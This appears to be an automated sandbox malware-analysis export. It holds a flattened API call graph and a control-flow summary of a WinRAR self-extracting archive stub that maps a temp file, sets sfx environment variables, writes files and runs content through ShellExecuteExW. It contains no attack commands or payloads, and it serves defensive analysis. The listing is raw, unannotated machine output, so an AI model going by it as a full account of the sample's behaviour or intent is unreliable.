e4092 _swprintf 51 API calls 24653->24656 24691 fbe9c _wcslen 24654->24691 24655 fbff0 24659 fc020 24655->24659 24662 ee617 53 API calls 24655->24662 24661 fba29 24656->24661 24657 fc73f 97 API calls 24657->24655 24658 fb9d9 24780 ea0b1 24658->24780 24664 fc73f 97 API calls 24659->24664 24714 fc0d8 24659->24714 24665 fd4d4 16 API calls 24661->24665 24667 fc003 SetDlgItemTextW 24662->24667 24670 fc03b 24664->24670 24665->24658 24666 fc18b 24671 fc19d 24666->24671 24672 fc194 EnableWindow 24666->24672 24674 ee617 53 API calls 24667->24674 24668 fba73 24786 fac04 SetCurrentDirectoryW 24668->24786 24669 fba68 GetLastError 24669->24668 24683 fc04d 24670->24683 24711 fc072 24670->24711 24678 fc1ba 24671->24678 24896 e12d3 GetDlgItem EnableWindow 24671->24896 24672->24671 24673 fbeed 24677 ee617 53 API calls 24673->24677 24679 fc017 SetDlgItemTextW 24674->24679 24676 fba87 24680 fba9e 24676->24680 24681 fba90 GetLastError 24676->24681 24677->24682 24686 fc1e1 24678->24686 24696 fc1d9 SendMessageW 24678->24696 24679->24659 24688 fbb11 24680->24688 24693 fbb20 24680->24693 24697 fbaae GetTickCount 24680->24697 24681->24680 24894 f9ed5 32 API calls 24683->24894 24684 fc0cb 24687 fc73f 97 API calls 24684->24687 24686->24682 24698 ee617 53 API calls 24686->24698 24687->24714 24692 fbd56 24688->24692 24688->24693 24690 fc1b0 24897 e12d3 GetDlgItem EnableWindow 24690->24897 24691->24673 24699 ee617 53 API calls 24691->24699 24795 e12f1 GetDlgItem ShowWindow 24692->24795 24700 fbcfb 24693->24700 24702 fbb39 GetModuleFileNameW 24693->24702 24703 fbcf1 24693->24703 24694 fc066 24694->24711 24696->24686 24705 e4092 _swprintf 51 API calls 24697->24705 24706 fb862 24698->24706 24707 fbed0 24699->24707 24710 ee617 53 API calls 24700->24710 24701 fc169 24895 f9ed5 32 API calls 24701->24895 24886 ef28c 24702->24886 24703->24614 24703->24700 24713 fbac7 24705->24713 24706->24648 24706->24682 24715 e4092 _swprintf 51 API calls 24707->24715 24718 fbd05 24710->24718 24711->24684 24719 fc73f 97 API calls 24711->24719 24712 fbd66 24796 e12f1 GetDlgItem ShowWindow 24712->24796 24787 e966e 24713->24787 24714->24666 24714->24701 24721 ee617 53 API calls 24714->24721 24715->24673 24716 fc188 24716->24666 24723 e4092 _swprintf 51 API calls 24718->24723 24724 fc0a0 24719->24724 24721->24714 24722 e4092 _swprintf 51 API calls 24726 fbb81 CreateFileMappingW 24722->24726 24727 fbd23 24723->24727 24724->24684 24728 fc0a9 DialogBoxParamW 24724->24728 24725 fbd70 24729 ee617 53 API calls 24725->24729 24731 fbc60 __InternalCxxFrameHandler 24726->24731 24732 fbbe3 GetCommandLineW 24726->24732 24741 ee617 53 API calls 24727->24741 24728->24614 24728->24684 24733 fbd7a SetDlgItemTextW 24729->24733 24736 fbc6b ShellExecuteExW 24731->24736 24735 fbbf4 24732->24735 24797 e12f1 GetDlgItem ShowWindow 24733->24797 24734 fbaed 24738 fbaf4 GetLastError 24734->24738 24739 fbaff 24734->24739 24890 fb425 SHGetMalloc 24735->24890 24760 fbc88 24736->24760 24738->24739 24743 e959a 80 API calls 24739->24743 24745 fbd3d 24741->24745 24742 fbd8c SetDlgItemTextW GetDlgItem 24746 fbda9 GetWindowLongW SetWindowLongW 24742->24746 24747 fbdc1 24742->24747 24743->24688 24744 fbc10 24891 fb425 SHGetMalloc 24744->24891 24746->24747 24798 fc73f 24747->24798 24750 fbc1c 24892 fb425 SHGetMalloc 24750->24892 24753 fc73f 97 API calls 24754 fbddd 24753->24754 24823 fda52 24754->24823 24755 fbccb 24755->24703 24758 fbce1 UnmapViewOfFile CloseHandle 24755->24758 24756 fbc28 24759 ef3fa 82 API calls 24756->24759 24758->24703 24762 fbc3f MapViewOfFile 24759->24762 24760->24755 24763 fbcb7 Sleep 24760->24763 24762->24731 24763->24755 24763->24760 24764 fc73f 97 API calls 24767 fbe03 24764->24767 24765 fbe2c 24893 e12d3 GetDlgItem EnableWindow 24765->24893 24767->24765 24769 fc73f 97 API calls 24767->24769 24768->24614 24768->24638 24769->24765 24771 e1378 24770->24771 24773 e131f 24770->24773 24899 ee2c1 GetWindowLongW SetWindowLongW 24771->24899 24774 e1385 24773->24774 24898 ee2e8 62 API calls 2 library calls 24773->24898 24774->24606 24774->24607 24774->24682 24776 e1341 24776->24774 24777 e1354 GetDlgItem 24776->24777 24777->24774 24778 e1364 24777->24778 24778->24774 24779 e136a SetWindowTextW 24778->24779 24779->24774 24782 ea0bb 24780->24782 24781 ea14c 24785 ea175 24781->24785 24900 ea2b2 24781->24900 24782->24781 24784 ea2b2 8 API calls 24782->24784 24782->24785 24784->24782 24785->24668 24785->24669 24786->24676 24788 e9678 24787->24788 24789 e96d5 CreateFileW 24788->24789 24790 e96c9 24788->24790 24789->24790 24791 e971f 24790->24791 24792 ebb03 GetCurrentDirectoryW 24790->24792 24791->24734 24793 e9704 24792->24793 24793->24791 24794 e9708 CreateFileW 24793->24794 24794->24791 24795->24712 24796->24725 24797->24742 24799 fc749 __EH_prolog 24798->24799 24800 fbdcf 24799->24800 24801 fb314 ExpandEnvironmentStringsW 24799->24801 24800->24753 24812 fc780 _wcslen _wcsrchr 24801->24812 24803 fb314 ExpandEnvironmentStringsW 24803->24812 24804 fca67 SetWindowTextW 24804->24812 24807 103e3e 22 API calls 24807->24812 24809 fc855 SetFileAttributesW 24811 fc90f GetFileAttributesW 24809->24811 24822 fc86f _abort _wcslen 24809->24822 24811->24812 24814 fc921 DeleteFileW 24811->24814 24812->24800 24812->24803 24812->24804 24812->24807 24812->24809 24815 fcc31 GetDlgItem SetWindowTextW SendMessageW 24812->24815 24818 fcc71 SendMessageW 24812->24818 24921 f1fbb CompareStringW 24812->24921 24922 fa64d GetCurrentDirectoryW 24812->24922 24924 ea5d1 6 API calls 24812->24924 24925 ea55a FindClose 24812->24925 24926 fb48e 76 API calls 2 library calls 24812->24926 24814->24812 24816 fc932 24814->24816 24815->24812 24817 e4092 _swprintf 51 API calls 24816->24817 24819 fc952 GetFileAttributesW 24817->24819 24818->24812 24819->24816 24820 fc967 MoveFileW 24819->24820 24820->24812 24821 fc97f MoveFileExW 24820->24821 24821->24812 24822->24811 24822->24812 24923 eb991 51 API calls 2 library calls 24822->24923 24824 fda5c __EH_prolog 24823->24824 24927 f0659 24824->24927 24826 fda8d 24931 e5b3d 24826->24931 24828 fdaab 24935 e7b0d 24828->24935 24832 fdafe 24951 e7b9e 24832->24951 24834 fbdee 24834->24764 24836 fd6a8 24835->24836 24837 fa5c6 4 API calls 24836->24837 24838 fd6ad 24837->24838 24839 fbf15 24838->24839 24840 fd6b5 GetWindow 24838->24840 24839->24615 24839->24616 24840->24839 24843 fd6d5 24840->24843 24841 fd6e2 GetClassNameW 25440 f1fbb CompareStringW 24841->25440 24843->24839 24843->24841 24844 fd76a GetWindow 24843->24844 24845 fd706 GetWindowLongW 24843->24845 24844->24839 24844->24843 24845->24844 24846 fd716 SendMessageW 24845->24846 24846->24844 24847 fd72c GetObjectW 24846->24847 25441 fa605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24847->25441 24849 fd743 25442 fa5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24849->25442 25443 fa80c 8 API calls 24849->25443 24852 fd754 SendMessageW DeleteObject 24852->24844 24853->24630 24855 fabcc 24854->24855 24856 fabf1 24854->24856 25444 f1fbb CompareStringW 24855->25444 24858 fabff 24856->24858 24859 fabf6 SHAutoComplete 24856->24859 24862 fb093 24858->24862 24859->24858 24860 fabdf 24860->24856 24861 fabe3 FindWindowExW 24860->24861 24861->24856 24863 fb09d __EH_prolog 24862->24863 24864 e13dc 84 API calls 24863->24864 24865 fb0bf 24864->24865 25445 e1fdc 24865->25445 24868 fb0eb 24871 e19af 128 API calls 24868->24871 24869 fb0d9 24870 e1692 86 API calls 24869->24870 24872 fb0e4 24870->24872 24874 fb10d __InternalCxxFrameHandler ___std_exception_copy 24871->24874 24872->24655 24872->24657 24873 e1692 86 API calls 24873->24872 24874->24873 24875->24706 24877 fb568 5 API calls 24876->24877 24878 fd4e0 GetDlgItem 24877->24878 24879 fd536 SendMessageW SendMessageW 24878->24879 24880 fd502 24878->24880 24881 fd572 24879->24881 24882 fd591 SendMessageW SendMessageW SendMessageW 24879->24882 24885 fd50d ShowWindow SendMessageW SendMessageW 24880->24885 24881->24882 24883 fd5e7 SendMessageW 24882->24883 24884 fd5c4 SendMessageW 24882->24884 24883->24658 24884->24883 24885->24879 24887 ef2ae 24886->24887 24888 ef295 24886->24888 24887->24722 24889 ef303 82 API calls 24888->24889 24889->24887 24890->24744 24891->24750 24892->24756 24893->24768 24894->24694 24895->24716 24896->24690 24897->24678 24898->24776 24899->24774 24901 ea2bf 24900->24901 24902 ea2e3 24901->24902 24903 ea2d6 CreateDirectoryW 24901->24903 24904 ea231 3 API calls 24902->24904 24903->24902 24906 ea316 24903->24906 24905 ea2e9 24904->24905 24907 ea329 GetLastError 24905->24907 24909 ebb03 GetCurrentDirectoryW 24905->24909 24908 ea325 24906->24908 24913 ea4ed 24906->24913 24907->24908 24908->24785 24911 ea2ff 24909->24911 24911->24907 24912 ea303 CreateDirectoryW 24911->24912 24912->24906 24912->24907 24914 fec50 24913->24914 24915 ea4fa SetFileAttributesW 24914->24915 24916 ea53d 24915->24916 24917 ea510 24915->24917 24916->24908 24918 ebb03 GetCurrentDirectoryW 24917->24918 24919 ea524 24918->24919 24919->24916 24920 ea528 SetFileAttributesW 24919->24920 24920->24916 24921->24812 24922->24812 24923->24822 24924->24812 24925->24812 24926->24812 24928 f0666 _wcslen 24927->24928 24955 e17e9 24928->24955 24930 f067e 24930->24826 24932 f0659 _wcslen 24931->24932 24933 e17e9 78 API calls 24932->24933 24934 f067e 24933->24934 24934->24828 24936 e7b17 __EH_prolog 24935->24936 24972 ece40 24936->24972 24938 e7b32 24939 feb38 8 API calls 24938->24939 24940 e7b5c 24939->24940 24978 f4a76 24940->24978 24943 e7c7d 24944 e7c87 24943->24944 24947 e7cf1 24944->24947 25007 ea56d 24944->25007 24946 e7d50 24949 e7d92 24946->24949 25013 e138b 74 API calls 24946->25013 24947->24946 24985 e8284 24947->24985 24949->24832 24952 e7bac 24951->24952 24954 e7bb3 24951->24954 24953 f2297 86 API calls 24952->24953 24953->24954 24956 e17ff 24955->24956 24967 e185a __InternalCxxFrameHandler 24955->24967 24957 e1828 24956->24957 24968 e6c36 76 API calls __vswprintf_c_l 24956->24968 24959 e1887 24957->24959 24960 e1847 ___std_exception_copy 24957->24960 24962 103e3e 22 API calls 24959->24962 24960->24967 24970 e6ca7 75 API calls 24960->24970 24961 e181e 24969 e6ca7 75 API calls 24961->24969 24964 e188e 24962->24964 24964->24967 24971 e6ca7 75 API calls 24964->24971 24967->24930 24968->24961 24969->24957 24970->24967 24971->24967 24973 ece4a __EH_prolog 24972->24973 24974 feb38 8 API calls 24973->24974 24975 ece8d 24974->24975 24976 feb38 8 API calls 24975->24976 24977 eceb1 24976->24977 24977->24938 24979 f4a80 __EH_prolog 24978->24979 24980 feb38 8 API calls 24979->24980 24981 f4a9c 24980->24981 24982 e7b8b 24981->24982 24984 f0e46 80 API calls 24981->24984 24982->24943 24984->24982 24986 e828e __EH_prolog 24985->24986 25014 e13dc 24986->25014 24988 e82aa 24989 e82bb 24988->24989 25157 e9f42 24988->25157 24992 e82f2 24989->24992 25022 e1a04 24989->25022 25153 e1692 24992->25153 24998 e83e8 25049 e1f6d 24998->25049 25001 e82ee 25001->24992 25003 ea56d 7 API calls 25001->25003 25005 e8389 25001->25005 25161 ec0c5 CompareStringW _wcslen 25001->25161 25003->25001 25041 e8430 25005->25041 25006 e83f3 25006->24992 25053 e3b2d 25006->25053 25065 e848e 25006->25065 25008 ea582 25007->25008 25009 ea5b0 25008->25009 25429 ea69b 25008->25429 25009->24944 25011 ea592 25011->25009 25012 ea597 FindClose 25011->25012 25012->25009 25013->24949 25015 e13e1 __EH_prolog 25014->25015 25016 ece40 8 API calls 25015->25016 25017 e1419 25016->25017 25018 feb38 8 API calls 25017->25018 25021 e1474 _abort 25017->25021 25019 e1461 25018->25019 25020 eb505 84 API calls 25019->25020 25019->25021 25020->25021 25021->24988 25023 e1a0e __EH_prolog 25022->25023 25032 e1a61 25023->25032 25035 e1b9b 25023->25035 25162 e13ba 25023->25162 25025 e1bc7 25165 e138b 74 API calls 25025->25165 25028 e3b2d 101 API calls 25033 e1c12 25028->25033 25029 e1bd4 25029->25028 25029->25035 25030 e1c5a 25030->25035 25036 e1c8d 25030->25036 25166 e138b 74 API calls 25030->25166 25032->25025 25032->25029 25032->25035 25033->25030 25034 e3b2d 101 API calls 25033->25034 25034->25033 25035->25001 25036->25035 25039 e9e80 79 API calls 25036->25039 25037 e1cde 25037->25035 25038 e3b2d 101 API calls 25037->25038 25038->25037 25039->25037 25040 e9e80 79 API calls 25040->25032 25184 ecf3d 25041->25184 25043 e8440 25188 f13d2 GetSystemTime SystemTimeToFileTime 25043->25188 25045 e83a3 25045->24998 25046 f1b66 25045->25046 25193 fde6b 25046->25193 25050 e1f72 __EH_prolog 25049->25050 25052 e1fa6 25050->25052 25201 e19af 25050->25201 25052->25006 25054 e3b3d 25053->25054 25055 e3b39 25053->25055 25064 e9e80 79 API calls 25054->25064 25055->25006 25056 e3b4f 25057 e3b6a 25056->25057 25058 e3b78 25056->25058 25059 e3baa 25057->25059 25363 e32f7 89 API calls 2 library calls 25057->25363 25364 e286b 101 API calls 3 library calls 25058->25364 25059->25006 25062 e3b76 25062->25059 25365 e20d7 74 API calls 25062->25365 25064->25056 25066 e8498 __EH_prolog 25065->25066 25071 e84d5 25066->25071 25080 e8513 25066->25080 25390 f8c8d 103 API calls 25066->25390 25067 e84f5 25069 e851c 25067->25069 25070 e84fa 25067->25070 25069->25080 25392 f8c8d 103 API calls 25069->25392 25070->25080 25391 e7a0d 152 API calls 25070->25391 25071->25067 25073 e857a 25071->25073 25071->25080 25073->25080 25366 e5d1a 25073->25366 25076 e8605 25076->25080 25372 e8167 25076->25372 25079 e8797 25081 ea56d 7 API calls 25079->25081 25082 e8802 25079->25082 25080->25006 25081->25082 25378 e7c0d 25082->25378 25084 ed051 82 API calls 25090 e885d 25084->25090 25085 e898b 25395 e2021 74 API calls 25085->25395 25086 e8a5f 25091 e8ab6 25086->25091 25103 e8a6a 25086->25103 25087 e8992 25087->25086 25093 e89e1 25087->25093 25090->25080 25090->25084 25090->25085 25090->25087 25393 e8117 84 API calls 25090->25393 25394 e2021 74 API calls 25090->25394 25099 e8a4c 25091->25099 25398 e7fc0 97 API calls 25091->25398 25092 e8b14 25095 e8b82 25092->25095 25141 e9105 25092->25141 25399 e98bc 25092->25399 25093->25092 25098 ea231 3 API calls 25093->25098 25093->25099 25101 eab1a 8 API calls 25095->25101 25096 e959a 80 API calls 25096->25080 25097 e959a 80 API calls 25097->25080 25100 e8a19 25098->25100 25099->25092 25110 e8ab4 25099->25110 25100->25099 25396 e92a3 97 API calls 25100->25396 25104 e8bd1 25101->25104 25103->25110 25397 e7db2 101 API calls 25103->25397 25106 eab1a 8 API calls 25104->25106 25123 e8be7 25106->25123 25110->25097 25111 e8b70 25403 e6e98 77 API calls 25111->25403 25113 e8d18 25116 e8d8a 25113->25116 25117 e8d28 25113->25117 25114 e8e40 25118 e8e66 25114->25118 25119 e8e52 25114->25119 25138 e8d49 25114->25138 25115 e8cbc 25115->25113 25115->25114 25124 e8167 19 API calls 25116->25124 25120 e8d6e 25117->25120 25129 e8d37 25117->25129 25122 f3377 75 API calls 25118->25122 25121 e9215 123 API calls 25119->25121 25120->25138 25406 e77b8 111 API calls 25120->25406 25121->25138 25125 e8e7f 25122->25125 25123->25115 25126 e8c93 25123->25126 25132 e981a 79 API calls 25123->25132 25128 e8dbd 25124->25128 25131 f3020 123 API calls 25125->25131 25126->25115 25404 e9a3c 82 API calls 25126->25404 25134 e8de6 25128->25134 25135 e8df5 25128->25135 25128->25138 25405 e2021 74 API calls 25129->25405 25131->25138 25132->25126 25407 e7542 85 API calls 25134->25407 25408 e9155 93 API calls __EH_prolog 25135->25408 25144 e8f85 25138->25144 25409 e2021 74 API calls 25138->25409 25140 e9090 25140->25141 25143 ea4ed 3 API calls 25140->25143 25141->25096 25142 e903e 25385 e9da2 25142->25385 25145 e90eb 25143->25145 25144->25140 25144->25141 25144->25142 25384 e9f09 SetEndOfFile 25144->25384 25145->25141 25410 e2021 74 API calls 25145->25410 25148 e9085 25150 e9620 77 API calls 25148->25150 25150->25140 25151 e90fb 25411 e6dcb 76 API calls 25151->25411 25154 e16a4 25153->25154 25427 ecee1 86 API calls 25154->25427 25158 e9f59 25157->25158 25159 e9f63 25158->25159 25428 e6d0c 78 API calls 25158->25428 25159->24989 25161->25001 25167 e1732 25162->25167 25164 e13d6 25164->25040 25165->25035 25166->25036 25168 e1748 25167->25168 25179 e17a0 __InternalCxxFrameHandler 25167->25179 25169 e1771 25168->25169 25180 e6c36 76 API calls __vswprintf_c_l 25168->25180 25170 e17c7 25169->25170 25174 e178d ___std_exception_copy 25169->25174 25173 103e3e 22 API calls 25170->25173 25172 e1767 25181 e6ca7 75 API calls 25172->25181 25176 e17ce 25173->25176 25174->25179 25182 e6ca7 75 API calls 25174->25182 25176->25179 25183 e6ca7 75 API calls 25176->25183 25179->25164 25180->25172 25181->25169 25182->25179 25183->25179 25185 ecf4d 25184->25185 25187 ecf54 25184->25187 25189 e981a 25185->25189 25187->25043 25188->25045 25190 e9833 25189->25190 25192 e9e80 79 API calls 25190->25192 25191 e9865 25191->25187 25192->25191 25194 fde78 25193->25194 25195 ee617 53 API calls 25194->25195 25196 fde9b 25195->25196 25197 e4092 _swprintf 51 API calls 25196->25197 25198 fdead 25197->25198 25199 fd4d4 16 API calls 25198->25199 25200 f1b7c 25199->25200 25200->24998 25202 e19bf 25201->25202 25204 e19bb 25201->25204 25205 e18f6 25202->25205 25204->25052 25206 e1908 25205->25206 25207 e1945 25205->25207 25208 e3b2d 101 API calls 25206->25208 25213 e3fa3 25207->25213 25212 e1928 25208->25212 25212->25204 25217 e3fac 25213->25217 25214 e3b2d 101 API calls 25214->25217 25215 e1966 25215->25212 25218 e1e50 25215->25218 25217->25214 25217->25215 25230 f0e08 25217->25230 25219 e1e5a __EH_prolog 25218->25219 25238 e3bba 25219->25238 25221 e1e84 25222 e1732 78 API calls 25221->25222 25224 e1f0b 25221->25224 25223 e1e9b 25222->25223 25266 e18a9 78 API calls 25223->25266 25224->25212 25226 e1eb3 25228 e1ebf _wcslen 25226->25228 25267 f1b84 MultiByteToWideChar 25226->25267 25268 e18a9 78 API calls 25228->25268 25231 f0e0f 25230->25231 25232 f0e2a 25231->25232 25236 e6c31 RaiseException _com_raise_error 25231->25236 25234 f0e3b SetThreadExecutionState 25232->25234 25237 e6c31 RaiseException _com_raise_error 25232->25237 25234->25217 25236->25232 25237->25234 25239 e3bc4 __EH_prolog 25238->25239 25240 e3bda 25239->25240 25241 e3bf6 25239->25241 25294 e138b 74 API calls 25240->25294 25242 e3e51 25241->25242 25246 e3c22 25241->25246 25319 e138b 74 API calls 25242->25319 25245 e3be5 25245->25221 25246->25245 25269 f3377 25246->25269 25248 e3ca3 25249 e3d2e 25248->25249 25265 e3c9a 25248->25265 25297 ed051 25248->25297 25279 eab1a 25249->25279 25250 e3c9f 25250->25248 25296 e20bd 78 API calls 25250->25296 25251 e3c8f 25295 e138b 74 API calls 25251->25295 25252 e3c71 25252->25248 25252->25250 25252->25251 25254 e3d41 25259 e3dd7 25254->25259 25260 e3dc7 25254->25260 25303 f3020 25259->25303 25283 e9215 25260->25283 25263 e3dd5 25263->25265 25312 e2021 74 API calls 25263->25312 25313 f2297 25265->25313 25266->25226 25267->25228 25268->25224 25270 f338c 25269->25270 25272 f3396 ___std_exception_copy 25269->25272 25320 e6ca7 75 API calls 25270->25320 25273 f34c6 25272->25273 25274 f341c 25272->25274 25278 f3440 _abort 25272->25278 25322 10238d RaiseException 25273->25322 25321 f32aa 75 API calls 3 library calls 25274->25321 25277 f34f2 25278->25252 25280 eab28 25279->25280 25282 eab32 25279->25282 25281 feb38 8 API calls 25280->25281 25281->25282 25282->25254 25284 e921f __EH_prolog 25283->25284 25323 e7c64 25284->25323 25287 e13ba 78 API calls 25288 e9231 25287->25288 25326 ed114 25288->25326 25290 e928a 25290->25263 25292 ed114 118 API calls 25293 e9243 25292->25293 25293->25290 25293->25292 25335 ed300 97 API calls __InternalCxxFrameHandler 25293->25335 25294->25245 25295->25265 25296->25248 25298 ed084 25297->25298 25299 ed072 25297->25299 25301 e603a 82 API calls 25298->25301 25336 e603a 25299->25336 25302 ed07c 25301->25302 25302->25249 25304 f3029 25303->25304 25305 f3052 25303->25305 25306 f3046 25304->25306 25308 f3048 25304->25308 25310 f303e 25304->25310 25305->25306 25361 f552f 123 API calls 2 library calls 25305->25361 25306->25263 25360 f624a 118 API calls 25308->25360 25347 f6cdc 25310->25347 25312->25265 25315 f22a1 25313->25315 25314 f22ba 25362 f0eed 86 API calls 25314->25362 25315->25314 25318 f22ce 25315->25318 25317 f22c1 25317->25318 25319->25245 25320->25272 25321->25278 25322->25277 25324 eb146 GetVersionExW 25323->25324 25325 e7c69 25324->25325 25325->25287 25332 ed12a __InternalCxxFrameHandler 25326->25332 25327 ed29a 25328 ed2ce 25327->25328 25329 ed0cb 6 API calls 25327->25329 25330 f0e08 SetThreadExecutionState RaiseException 25328->25330 25329->25328 25333 ed291 25330->25333 25331 f8c8d 103 API calls 25331->25332 25332->25327 25332->25331 25332->25333 25334 eac05 91 API calls 25332->25334 25333->25293 25334->25332 25335->25293 25337 e6059 25336->25337 25346 e60d5 25336->25346 25338 ef28c 82 API calls 25337->25338 25337->25346 25339 e6081 25338->25339 25340 f1da7 WideCharToMultiByte 25339->25340 25341 e6094 25340->25341 25342 e6099 25341->25342 25343 e60d7 25341->25343 25345 e63e2 82 API calls 25342->25345 25342->25346 25344 e6122 82 API calls 25343->25344 25344->25346 25345->25346 25346->25302 25348 f359e 75 API calls 25347->25348 25354 f6ced __InternalCxxFrameHandler 25348->25354 25349 ed114 118 API calls 25349->25354 25350 f70fe 25351 f5202 98 API calls 25350->25351 25352 f710e __InternalCxxFrameHandler 25351->25352 25352->25306 25353 f11cf 81 API calls 25353->25354 25354->25349 25354->25350 25354->25353 25355 f3e0b 118 API calls 25354->25355 25356 f7153 118 API calls 25354->25356 25357 f0f86 88 API calls 25354->25357 25358 f77ef 123 API calls 25354->25358 25359 f390d 98 API calls 25354->25359 25355->25354 25356->25354 25357->25354 25358->25354 25359->25354 25360->25306 25361->25306 25362->25317 25363->25062 25364->25062 25365->25059 25367 e5d2a 25366->25367 25412 e5c4b 25367->25412 25369 e5d5d 25371 e5d95 25369->25371 25417 eb1dc CharUpperW CompareStringW _wcslen ___vcrt_FlsFree 25369->25417 25371->25076 25373 e8186 25372->25373 25374 e8232 25373->25374 25424 ebe5e 19 API calls __InternalCxxFrameHandler 25373->25424 25423 f1fac CharUpperW 25374->25423 25377 e823b 25377->25079 25379 e7c22 25378->25379 25380 e7c5a 25379->25380 25425 e6e7a 74 API calls 25379->25425 25380->25090 25382 e7c52 25426 e138b 74 API calls 25382->25426 25384->25142 25386 e9db3 25385->25386 25388 e9dc2 25385->25388 25387 e9db9 FlushFileBuffers 25386->25387 25386->25388 25387->25388 25389 e9e3f SetFileTime 25388->25389 25389->25148 25390->25071 25391->25080 25392->25080 25393->25090 25394->25090 25395->25087 25396->25099 25397->25110 25398->25099 25400 e98c5 GetFileType 25399->25400 25401 e8b5a 25399->25401 25400->25401 25401->25095 25402 e2021 74 API calls 25401->25402 25402->25111 25403->25095 25404->25115 25405->25138 25406->25138 25407->25138 25408->25138 25409->25144 25410->25151 25411->25141 25418 e5b48 25412->25418 25414 e5c6c 25414->25369 25416 e5b48 2 API calls 25416->25414 25417->25369 25419 e5b52 25418->25419 25421 e5c3a 25419->25421 25422 eb1dc CharUpperW CompareStringW _wcslen ___vcrt_FlsFree 25419->25422 25421->25414 25421->25416 25422->25419 25423->25377 25424->25374 25425->25382 25426->25380 25428->25159 25430 ea6a8 25429->25430 25431 ea727 FindNextFileW 25430->25431 25432 ea6c1 FindFirstFileW 25430->25432 25433 ea732 GetLastError 25431->25433 25439 ea709 25431->25439 25434 ea6d0 25432->25434 25432->25439 25433->25439 25435 ebb03 GetCurrentDirectoryW 25434->25435 25436 ea6e0 25435->25436 25437 ea6fe GetLastError 25436->25437 25438 ea6e4 FindFirstFileW 25436->25438 25437->25439 25438->25437 25438->25439 25439->25011 25440->24843 25441->24849 25442->24849 25443->24852 25444->24860 25446 e9f42 78 API calls 25445->25446 25447 e1fe8 25446->25447 25448 e1a04 101 API calls 25447->25448 25451 e2005 25447->25451 25449 e1ff5 25448->25449 25449->25451 25452 e138b 74 API calls 25449->25452 25451->24868 25451->24869 25452->25451 25453 e13e1 84 API calls 2 library calls 25511 f94e0 GetClientRect 25534 f21e0 26 API calls std::bad_exception::bad_exception 25550 ff2e0 46 API calls __RTC_Initialize 25551 10bee0 GetCommandLineA GetCommandLineW 25535 e95f0 80 API calls 25536 ffd4f 9 API calls 2 library calls 25552 e5ef0 82 API calls

                                                                                                                                          Control-flow Graph

                                                                                                                                          APIs
                                                                                                                                            • Part of subcall function 000F0863: GetModuleHandleW.KERNEL32(kernel32), ref: 000F087C
                                                                                                                                            • Part of subcall function 000F0863: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 000F088E
                                                                                                                                            • Part of subcall function 000F0863: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 000F08BF
                                                                                                                                            • Part of subcall function 000FA64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 000FA655
                                                                                                                                            • Part of subcall function 000FAC16: OleInitialize.OLE32(00000000), ref: 000FAC2F
                                                                                                                                            • Part of subcall function 000FAC16: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 000FAC66
                                                                                                                                            • Part of subcall function 000FAC16: SHGetMalloc.SHELL32(00128438), ref: 000FAC70
                                                                                                                                          • GetCommandLineW.KERNEL32 ref: 000FDF5C
                                                                                                                                          • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 000FDF83
                                                                                                                                          • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 000FDF94
                                                                                                                                          • UnmapViewOfFile.KERNEL32(00000000), ref: 000FDFCE
                                                                                                                                            • Part of subcall function 000FDBDE: SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 000FDBF4
                                                                                                                                            • Part of subcall function 000FDBDE: SetEnvironmentVariableW.KERNELBASE(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 000FDC30
                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 000FDFD7
                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,0013EC90,00000800), ref: 000FDFF2
                                                                                                                                          • SetEnvironmentVariableW.KERNEL32(sfxname,0013EC90), ref: 000FDFFE
                                                                                                                                          • GetLocalTime.KERNEL32(?), ref: 000FE009
                                                                                                                                          • _swprintf.LIBCMT ref: 000FE048
                                                                                                                                          • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 000FE05A
                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 000FE061
                                                                                                                                          • LoadIconW.USER32(00000000,00000064), ref: 000FE078
                                                                                                                                          • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 000FE0C9
                                                                                                                                          • Sleep.KERNEL32(?), ref: 000FE0F7
                                                                                                                                          • DeleteObject.GDI32 ref: 000FE130
                                                                                                                                          • DeleteObject.GDI32(?), ref: 000FE140
                                                                                                                                          • CloseHandle.KERNEL32 ref: 000FE183
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                                                                                                                          • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                                                                                                          • API String ID: 3049964643-3743209390
                                                                                                                                          • Opcode ID: acc7554025e8e22b328270ca2209a0d0b96d69b9bd41175f1ed757ef76900819
                                                                                                                                          • Instruction ID: 6643fa6bf9f1c966e994ef2890b311543f6d6bf7468a65174e92692c75a0c3a6
